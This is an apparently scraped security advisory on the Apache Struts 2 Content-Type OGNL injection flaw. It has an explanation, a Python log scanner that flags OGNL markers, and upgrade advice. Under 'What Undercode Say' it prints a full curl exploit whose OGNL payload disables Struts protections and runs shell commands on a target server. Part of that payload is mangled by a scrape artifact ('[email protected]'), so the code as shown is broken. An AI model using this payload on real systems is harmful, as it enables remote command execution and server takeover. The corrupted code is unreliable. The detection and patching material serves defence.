How the mentioned CVE works:
The vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. When a file upload request is sent to a Struts-powered application, the framework handles the `Content-Type` header incorrectly: an attacker can craft a malicious `Content-Type` value containing an Object-Graph Navigation Language (OGNL) expression, and because of flawed exception handling in the parser, that expression is evaluated by the Struts framework. The evaluation happens before any application-specific validation runs, so no authentication is required. The OGNL payload is interpreted on the server, giving the attacker the ability to execute arbitrary system commands with the same privileges as the application itself.
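Because a legitimate `Content-Type` is only a MIME type plus parameters, an OGNL expression in that header is a reliable detection signal. The following Python check is an added example, not part of the original post: it scans a constructed log sample (the log format with the `Content-Type` header as a quoted fourth field is an assumption) and flags requests whose header value carries OGNL markers, including URL-encoded ones.

```python
import re
from urllib.parse import unquote

# Constructed sample log in an assumed format: client, method, path, then the
# Content-Type request header in double quotes. Not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 POST /upload.action "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"
203.0.113.9 POST /upload.action "%{(#_='multipart/form-data')}"
198.51.100.3 POST /upload.action "%25%7B%28%23_%3D%27multipart%2Fform-data%27%29%7D"
198.51.100.7 GET /index.action "-"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "(.*)"$')

# A legitimate Content-Type is a MIME type plus parameters. OGNL expressions
# open with %{ or ${, and S2-045 payloads reference Struts/OGNL internals such
# as #_memberAccess, @ognl.OgnlContext or ProcessBuilder. None of these belong
# in a Content-Type header, so any of them is treated as an injection attempt.
OGNL_MARKERS = re.compile(
    r"(%\{|\$\{|#_memberAccess|@ognl\.OgnlContext|java\.lang\.ProcessBuilder)",
    re.IGNORECASE,
)

def normalize(value: str) -> str:
    """Percent-decode up to two levels so URL-encoded payloads are inspected."""
    decoded = value
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded

def is_suspicious_content_type(value: str) -> bool:
    """True if the header value carries OGNL expression markers."""
    return OGNL_MARKERS.search(normalize(value)) is not None

def scan_log(text: str) -> list:
    """Return one alert dict per log line whose Content-Type looks like OGNL."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, ctype = m.groups()
        if is_suspicious_content_type(ctype):
            alerts.append({"client": client, "path": path, "content_type": normalize(ctype)})
    return alerts
```

The same `is_suspicious_content_type` check can sit in a WAF rule or a servlet filter in front of the upload endpoint as a stopgap, but it complements rather than replaces the upgrade listed under protection.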
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: 2017-03-20
What Undercode Say:
`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target/upload.action`
How to exploit:
Craft a malicious HTTP request with an OGNL expression in the `Content-Type` header.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1.
Impact:
Full server compromise, arbitrary command execution.
Sources:
Reported By: nvd.nist.gov